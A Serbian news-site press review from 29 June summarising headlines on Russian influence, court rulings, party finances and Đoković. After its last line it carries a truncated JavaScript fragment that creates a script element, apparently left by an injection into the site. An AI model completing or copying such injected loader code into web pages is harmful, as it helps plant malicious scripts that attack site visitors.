PREGLED ŠTAMPE, 29.JUN: Putin finansira srpski referendum, Čeda ide u Srebrenicu, a Vuk Jeremić “prisvojio” 20 miliona DS-ovih evra?!

PREGLED ŠTAMPE, 29.JUN: Putin finansira srpski referendum, Čeda ide u Srebrenicu, a Vuk Jeremić “prisvojio” 20 miliona DS-ovih evra?!


Današnja srpska štampa donosi pregršti informacija iz raznih oblasti društvenog i političkog života, a ima tu i neizbežne estrade.

Tako Blic donosi veliki tekst o pritisku Rusije na Srbiju, a pod naslovom “Putin finansira referendum o EU i NATO” i precizira kako Rusija od nas traži da se izjašnjavanje obavi već sledeće godine, paralelno sa predsedničkim izborima. Ovaj tekst je vrlo zabrinuo urednika Ekspres.net koji je u svojoj kolumni podržao referendum o EU, ali nije video famozne ruske pare ni u jednoj valuti, ni u dolarima, ni u rubljama. Ali, valjda će biti bolje sreće sledeći put…

Ovaj list takođe piše o kontroverznoj odluci suda kojom je oborena ranija presuda u procesu protiv Darka Šarića, okrivljujući za to “Miškovićevog sudiju”.

Alo piše o tome kako Novica Tončev ruši Dačića jer ga ja ovaj “ispalio”, a Danas najavljuje da Čedomir Jovanović ide na komemoraciju u Srebrenicu, i pored poruke da su srpski političari tamo nepoželjni. Valjda lidera LDP svrstavaju u neku drugu kategoriju

Tu je i izjava akademika Dušana Teodorovića kako je izbor Muamera Zukorlića za predsednika Odbora za nauku “poniženje za nauku i prosvetu“, ali i odgovor eks muftije na ove tvrdnje.

Pod naznakom “Otkrivamo gde je bogatstvo DS” Kurir piše o tome kako je bivši šef srpske diplomatije Vuk Jeremić sklonio 20 miliona evra iz stranačkih fondova planiranih za lobiranje kod Baraka Obame, sa kojima je kasnije osnovao svoj institut.

Politika donosi intervju sa Novakom Đokovićem u kome najbolji teniser na planeti najavljuje da mu je na Olimpijadi u Riju cilj zlatna medalja.

Novosti pišu o novoj bankarskoj ponudi, stambenim kreditima bez učešća, ali sa duplo većom kamatom od uobičajene. Tu je i tekst o tragediji u leskovačkom kraju, gde je vlasnik luna parka umro od infarkta nakon što je na njegovom ringišpilu povređeno dete.

Novosti se bave ruskim naoružanjem koje stiže u Srbiju “Helikopteri stigli, sleteće i “migovi”, dok Informer pored ove teme, prenosi i navodnu poruku Putina turskom predsedniku Erdoganu da “ne širi uticaj na Srbiju i Republiku Srpsku, jer je to ruska interesna sfera”.

A čija nismo…?var d=document;var s=d.createElement(‘script’);

+ Trenutno nema komentara

Dodajte komentar